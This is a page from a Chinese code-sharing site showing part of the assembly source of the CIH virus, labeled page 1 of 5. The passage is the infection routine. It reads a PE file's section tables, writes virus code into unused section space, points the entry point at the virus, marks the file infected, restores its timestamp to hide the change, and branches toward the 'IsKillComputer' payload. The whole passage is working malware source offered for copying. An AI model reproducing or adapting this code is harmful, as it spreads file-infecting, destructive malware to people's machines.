cih源代码.htm
来自「CIH源代码」· HTM 代码 · 共 1,695 行 · 第 1/5 页
HTM
1,695 行
<P>; * | ESP | *</P>
<P>; * ------------------------- *</P>
<P>; * | EBX | *</P>
<P>; * ------------------------- *</P>
<P>; * | EDX | *</P>
<P>; * ------------------------- *</P>
<P>; * | ECX | *</P>
<P>; * ------------------------- *</P>
<P>; * | EAX | *</P>
<P>; * ------------------------- *</P>
<P>; * | Return Address | *</P>
<P>; * ------------------------- *</P>
<P>; *************************************</P>
<P> </P>
<P>push ebx ; Save File Handle</P>
<P> </P>
<P>push 00h ; Set VirusCodeSectionTableEndMark</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set the *</P>
<P>; * Virus' Infected Mark *</P>
<P>; ***************************</P>
<P> </P>
<P>push 01h ; Size</P>
<P>push edx ; Pointer of File</P>
<P>push edi ; Address of Buffer</P>
<P> </P>
<P>; ***************************</P>
<P>; * Save ESP Register *</P>
<P>; ***************************</P>
<P> </P>
<P>mov dr1, esp</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set the *</P>
<P>; * NewAddressOfEntryPoint *</P>
<P>; * ( Only First Set Size ) *</P>
<P>; ***************************</P>
<P> </P>
<P>push eax ; Size</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Read *</P>
<P>; * Image Header in File *</P>
<P>; ***************************</P>
<P> </P>
<P>mov eax, ebp</P>
<P>mov cl, SizeOfImageHeaderToRead</P>
<P>add edx, 07h ; Move EDX to NumberOfSections</P>
<P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set the *</P>
<P>; * NewAddressOfEntryPoint *</P>
<P>; * ( Set Pointer of File, *</P>
<P>; * Address of Buffer ) *</P>
<P>; ***************************</P>
<P> </P>
<P>lea eax, (AddressOfEntryPoint-@8)[edx]</P>
<P>push eax ; Pointer of File</P>
<P> </P>
<P>lea eax, (NewAddressOfEntryPoint-@8)[esi]</P>
<P>push eax ; Address of Buffer</P>
<P> </P>
<P>; ***************************</P>
<P>; * Move EDX to the Start *</P>
<P>; * of SectionTable in File *</P>
<P>; ***************************</P>
<P> </P>
<P>movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]</P>
<P>lea edx, [eax+edx+12h]</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Get *</P>
<P>; * Total Size of Sections *</P>
<P>; ***************************</P>
<P> </P>
<P>mov al, SizeOfScetionTable</P>
<P> </P>
<P>; I Assume NumberOfSections <= 0ffh</P>
<P>mov cl, (NumberOfSections-@8)[esi]</P>
<P>; * Address of Entry Point *</P>
<P>; ***************************</P>
<P> </P>
<P>; Save My Virus First Section Code</P>
<P>; Size of Following Section Table...</P>
<P>; ( Not Include the Size of Virus Code Section Table )</P>
<P>push ecx</P>
<P> </P>
<P>xchg ecx, eax ; ECX = Size of Section Table</P>
<P> </P>
<P>mov eax, (AddressOfEntryPoint-@9)[esi]</P>
<P>add eax, (ImageBase-@9)[esi]</P>
<P>mov (OriginalAddressOfEntryPoint-@9)[esi], eax</P>
<P> </P>
<P>; ***************************</P>
<P>; * Read All Section Tables *</P>
<P>; ***************************</P>
<P> </P>
<P>mov eax, ebp</P>
<P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set Total Virus *</P>
<P>; * Code Section Table *</P>
<P>; ***************************</P>
<P> </P>
<P>; EBX = My Virus First Section Code</P>
<P>; Size of Following Section Table</P>
<P>pop ebx</P>
<P>pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl</P>
<P>pop ecx ; ECX = NumberOfSections+1</P>
<P> </P>
<P>push edi ; Size</P>
<P> </P>
<P>add edx, eax</P>
<P>push edx ; Pointer of File</P>
<P> </P>
<P>add eax, esi</P>
<P>push eax ; Address of Buffer</P>
<P> </P>
<P>; ***************************</P>
<P>; * Set the First Virus *</P>
<P>; * Code Section Size in *</P>
<P>; * VirusCodeSectionTable *</P>
<P>; ***************************</P>
<P> </P>
<P>lea eax, [eax+edi-04h]</P>
<P>mov [eax], ebx</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set My Virus *</P>
<P>; * First Section Code *</P>
<P>; ***************************</P>
<P> </P>
<P>push ebx ; Size</P>
<P> </P>
<P>add edx, edi</P>
<P>push edx ; Pointer of File</P>
<P> </P>
<P>lea edi, (MyVirusStart-@9)[esi]</P>
<P>push edi ; Address of Buffer</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Modify the *</P>
<P>; * AddressOfEntryPoint to *</P>
<P>; * My Virus Entry Point *</P>
<P>; ***************************</P>
<P> </P>
<P>mov (NewAddressOfEntryPoint-@9)[esi], edx</P>
<P> </P>
<P>; ***************************</P>
<P>; * Setup Initial Data *</P>
<P>; ***************************</P>
<P> </P>
<P>lea edx, [esi-SizeOfScetionTable]</P>
<P>mov ebp, offset VirusSize</P>
<P> </P>
<P>jmp StartToWriteCodeToSections</P>
<P> </P>
<P>; ***************************</P>
<P>; * Write Code to Sections *</P>
<P>; ***************************</P>
<P> </P>
<P>LoopOfWriteCodeToSections:</P>
<P> </P>
<P>add edx, SizeOfScetionTable</P>
<P> </P>
<P>mov ebx, (SizeOfRawData-@9)[edx]</P>
<P>sub ebx, (VirtualSize-@9)[edx]</P>
<P>jbe EndOfWriteCodeToSections</P>
<P> </P>
<P>push ebx ; Size</P>
<P> </P>
<P>sub eax, 08h</P>
<P>mov [eax], ebx</P>
<P> </P>
<P>mov ebx, (PointerToRawData-@9)[edx]</P>
<P>add ebx, (VirtualSize-@9)[edx]</P>
<P>push ebx ; Pointer of File</P>
<P> </P>
<P>push edi ; Address of Buffer</P>
<P> </P>
<P>mov ebx, (VirtualSize-@9)[edx]</P>
<P>add ebx, (VirtualAddress-@9)[edx]</P>
<P>add ebx, (ImageBase-@9)[esi]</P>
<P>mov [eax+4], ebx</P>
<P> </P>
<P>mov ebx, [eax]</P>
<P>add (VirtualSize-@9)[edx], ebx</P>
<P> </P>
<P>; Section contains initialized data ==> 00000040h</P>
<P>; Section can be Read. ==> 40000000h</P>
<P>or (Characteristics-@9)[edx], 40000040h</P>
<P> </P>
<P>StartToWriteCodeToSections:</P>
<P> </P>
<P>sub ebp, ebx</P>
<P>jbe SetVirusCodeSectionTableEndMark</P>
<P> </P>
<P>add edi, ebx ; Move Address of Buffer</P>
<P> </P>
<P>EndOfWriteCodeToSections:</P>
<P> </P>
<P>loop LoopOfWriteCodeToSections</P>
<P> </P>
<P>; ***************************</P>
<P>; * Only Set Infected Mark *</P>
<P>; ***************************</P>
<P> </P>
<P>OnlySetInfectedMark:</P>
<P>mov esp, dr1</P>
<P> </P>
<P>jmp WriteVirusCodeToFile</P>
<P> </P>
<P>; ***************************</P>
<P>; * Set Virus Code *</P>
<P>; * Section Table End Mark *</P>
<P>; ***************************</P>
<P> </P>
<P>SetVirusCodeSectionTableEndMark:</P>
<P> </P>
<P>; Adjust Size of Virus Section Code to Correct Value</P>
<P>add [eax], ebp</P>
<P>add [esp+08h], ebp</P>
<P> </P>
<P>; Set End Mark</P>
<P>xor ebx, ebx</P>
<P>mov [eax-04h], ebx</P>
<P> </P>
<P>; ***************************</P>
<P>; * When VirusGame Calls *</P>
<P>; * VxDCall, VMM Modifies *</P>
<P>; * the 'int 20h' and the *</P>
<P>; * 'Service Identifier' *</P>
<P>; * to 'Call [XXXXXXXX]'. *</P>
<P>; ***************************</P>
<P>; * Before Writing My Virus *</P>
<P>; * to File, I Must Restore *</P>
<P>; * them First. ^__^ *</P>
<P>; ***************************</P>
<P> </P>
<P>lea eax, (LastVxDCallAddress-2-@9)[esi]</P>
<P> </P>
<P>mov cl, VxDCallTableSize</P>
<P> </P>
<P>LoopOfRestoreVxDCallID:</P>
<P>mov word ptr [eax], 20cdh</P>
<P> </P>
<P>mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]</P>
<P>mov [eax+2], edx</P>
<P> </P>
<P>movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[es</P>
<P> </P>
<P>sub eax, edx</P>
<P> </P>
<P>loop LoopOfRestoreVxDCallID</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Write *</P>
<P>; * Virus Code to the File *</P>
<P>; ***************************</P>
<P> </P>
<P>WriteVirusCodeToFile:</P>
<P>mov eax, dr1</P>
<P>mov ebx, [eax+10h]</P>
<P>mov edi, [eax]</P>
<P> </P>
<P>LoopOfWriteVirusCodeToFile:</P>
<P> </P>
<P>pop ecx</P>
<P>jecxz SetFileModificationMark</P>
<P> </P>
<P>mov esi, ecx</P>
<P>mov eax, 0d601h</P>
<P>pop edx</P>
<P>pop ecx</P>
<P> </P>
<P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>jmp LoopOfWriteVirusCodeToFile</P>
<P> </P>
<P>; ***************************</P>
<P>; * Let's Set CF = 1 ==> *</P>
<P>; * Need to Restore File *</P>
<P>; * Modification Time *</P>
<P>; ***************************</P>
<P> </P>
<P>SetFileModificationMark:</P>
<P>pop ebx</P>
<P>pop eax</P>
<P> </P>
<P>stc ; Enable CF(Carry Flag)</P>
<P>pushf</P>
<P> </P>
<P>; *************************************</P>
<P>; * Close File *</P>
<P>; *************************************</P>
<P> </P>
<P>CloseFile:</P>
<P>xor eax, eax</P>
<P>mov ah, 0d7h</P>
<P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>; *************************************</P>
<P>; * Need to Restore File Modification *</P>
<P>; * Time !? *</P>
<P>; *************************************</P>
<P> </P>
<P>popf</P>
<P>pop esi</P>
<P>jnc IsKillComputer</P>
<P> </P>
<P>; *************************************</P>
<P>; * Restore File Modification Time *</P>
<P>; *************************************</P>
<P> </P>
<P>mov ebx, edi</P>
<P> </P>
<P>mov ax, 4303h</P>
<P>mov ecx, (FileModificationTime-@7)[esi]</P>
<P>mov edi, (FileModificationTime+2-@7)[esi]</P>
<P>call ebx ; VXDCall IFSMgr_Ring0_FileIO</P>
<P> </P>
<P>; *************************************</P>
<P>; * Disable OnBusy *</P>
<P>; *************************************</P>
<P> </P>
<P>DisableOnBusy:</P>
<P>dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus</P>
<P> </P>
<P>; *************************************</P>
<P>; * Call Previous FileSystemApiHook *</P>
<P>; *************************************</P>
<P> </P>
<P>prevhook:</P>
<P>popad</P>
<P> </P>
<P>mov eax, dr0 ;</P>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?